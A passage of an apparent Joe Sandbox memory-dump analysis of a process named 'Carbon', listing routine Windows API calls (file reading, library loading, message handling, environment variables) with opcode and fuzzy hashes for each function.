                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free_free
                                                            • String ID:
                                                            • API String ID: 2716640707-0
                                                            • Opcode ID: 1da596e0670bc48de496a3165561cf7d074773c8782dd3d3520868b0d95e2574
                                                            • Instruction ID: 2cc6a1f31421cd714963b1b426ba0d7a198490ef67abc978e7e22f3b559b9880
                                                            • Opcode Fuzzy Hash: 1da596e0670bc48de496a3165561cf7d074773c8782dd3d3520868b0d95e2574
                                                            • Instruction Fuzzy Hash: B4E06D3754E5353BA22636297C89FAF2A1DDFC27A57250026F5088669BEE248D0241E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • TranslateMessage.USER32(?), ref: 008FE11B
                                                            • DispatchMessageW.USER32(?), ref: 008FE129
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FE13F
                                                            • Sleep.KERNEL32(0000000A), ref: 008FE151
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 0094225F
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                            • String ID:
                                                            • API String ID: 3288985973-0
                                                            • Opcode ID: b744bd435570bcc2348d95c2856c2aa748d287cdd258385e8d412c352d49b1a8
                                                            • Instruction ID: 56f66dad97070746950146ab52725f4ef7a04cf0a1a4c7e2f2c89e1e33e84689
                                                            • Opcode Fuzzy Hash: b744bd435570bcc2348d95c2856c2aa748d287cdd258385e8d412c352d49b1a8
                                                            • Instruction Fuzzy Hash: 5FF05E705193459BEB349B708C49FEA33ADFB84314F504929F719D30D0DB709488EB16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00901EA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00933391
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 008F318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008F31A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: X
                                                            • API String ID: 779396738-3081909835
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,008F9DE6,?,?,?), ref: 008F9FAC
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,008F9DE6,?,?,?), ref: 0093F6F4
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: File$PointerRead
                                                            • String ID:
                                                            • API String ID: 3154509469-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F3A5A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 008F5E30
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 009349F8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0092D191: GetEnvironmentStringsW.KERNEL32 ref: 0092D195
                                                            • _free.LIBCMT ref: 00921DBD
                                                            • _free.LIBCMT ref: 00921DC4
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free$EnvironmentStrings
                                                            • String ID:
                                                            • API String ID: 3523873077-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,008F9DF5,?,?,?), ref: 008F7750
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,008F9DF5,?,?,?), ref: 008F7786
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 626452242-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 008FBD7E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharUpperBuffW.USER32(008FA6A5,55CB840F,55CB8410,00000000,00000001,?,008FA6A5,?,00000001,?,?,?,00000000), ref: 008F6BC8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID:
                                                            • API String ID: 3964851224-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0095F9F8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID:
                                                            • API String ID: 2358735015-0
                                                            • Opcode ID: f6f0f44bcf610430b78a63a1ca82ffd96c95752961c6d08b5d05fae1bdb8c73e
                                                            • Instruction ID: 190411839db93ac364c909361a4dd51e91e1e6add880bc83250a648065c17c02
                                                            • Opcode Fuzzy Hash: f6f0f44bcf610430b78a63a1ca82ffd96c95752961c6d08b5d05fae1bdb8c73e
                                                            • Instruction Fuzzy Hash: F541B472A00209AFCB11DF69D8919AEB3B8FF84361F11453AE91AD7241EB70DE48CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008F54A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008F54F0,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F54AF
                                                              • Part of subcall function 008F54A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F54C1
                                                              • Part of subcall function 008F54A3: FreeLibrary.KERNEL32(00000000,?,?,008F54F0,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F54D3
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F5510
                                                              • Part of subcall function 008F546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0093466F,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F5475
                                                              • Part of subcall function 008F546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F5487
                                                              • Part of subcall function 008F546C: FreeLibrary.KERNEL32(00000000,?,?,0093466F,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F549A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: e0eb100bb9b7914cf89df6898c3558b9008b78419dd083ac67743eb3ab3bffe6
                                                            • Instruction ID: c77eef853933bf8b5c4ecf1beea89c95db7423ccf8f0006edd603bf56fe91e5b
                                                            • Opcode Fuzzy Hash: e0eb100bb9b7914cf89df6898c3558b9008b78419dd083ac67743eb3ab3bffe6
                                                            • Instruction Fuzzy Hash: F5112732700A0DAACB10BF38CC02BBD77A5FF94711F104429F782EA1C1EE749A459B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: f6b6e46917ff5b04a6b8df4917082c948e45495df7860e1ad2f8fcabe4222fcd
                                                            • Instruction ID: b3261aca4735d9146e6070c66cf59200806456d34af6594a07b36289351567c0
                                                            • Opcode Fuzzy Hash: f6b6e46917ff5b04a6b8df4917082c948e45495df7860e1ad2f8fcabe4222fcd
                                                            • Instruction Fuzzy Hash: CD112A7590420AAFCF05DF58E941E9B7BF9EF49310F104499F809AB311EA31DE21CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,008F5B20,?,00010000,00000000,00000000,00000000,00000000), ref: 008FA03C
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: f241f92bcf5301eccb897d3cfa6633d052135a5722432b733c27b3c1c6b6bb71
                                                            • Instruction ID: 6726bbac017a25c48a4079824f34985ed63d99137aceea2e34f5f7d6c08875c7
                                                            • Opcode Fuzzy Hash: f241f92bcf5301eccb897d3cfa6633d052135a5722432b733c27b3c1c6b6bb71
                                                            • Instruction Fuzzy Hash: 05116A71204B08EFD7248F25E480B62B7E8FF84364F14C42DE69A87A80CB71F844DB21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F27FA,009C2408,?,?,?,?,?,?,?,008F1727,?), ref: 008F19EA
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 4019309064-0
                                                            • Opcode ID: 1814c3aa845428294ce3f6852b34052e1b4b43ef79cf292f79a4ece477701d99
                                                            • Instruction ID: d8214aaf1d63bb15b070c2536313328f02d12e7cec86ff974ddd4ed353b1ea9d
                                                            • Opcode Fuzzy Hash: 1814c3aa845428294ce3f6852b34052e1b4b43ef79cf292f79a4ece477701d99
                                                            • Instruction Fuzzy Hash: EC11CE31A0522C9B9F05EBB48846EE9B7F8FF58344F0040A5B645E3290EE7097848B22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                            • Instruction ID: 24b9094aa5d70f2609e63957cb0c7271fdf368927d2513cb0b0b48e0916a8030
                                                            • Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                            • Instruction Fuzzy Hash: 21F0CD3660162866D6313B269C05BDA335C9FC3334F100B15FC65971D1DB74D54586D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 1d5f18026a2aea0eb86b747c449d749274531d2aa9ed3270faaa6109fca9b9dd
                                                            • Instruction ID: effb04eb1cdd82c79e7293901b80a120efe2b1206ca211c6f12fff5b315855e6
                                                            • Opcode Fuzzy Hash: 1d5f18026a2aea0eb86b747c449d749274531d2aa9ed3270faaa6109fca9b9dd
                                                            • Instruction Fuzzy Hash: 61F0CDB27017087ED7145F38D806BA6BB94EB84360F10852AFB1DCB2D1DB75E5908B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0096F6B1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
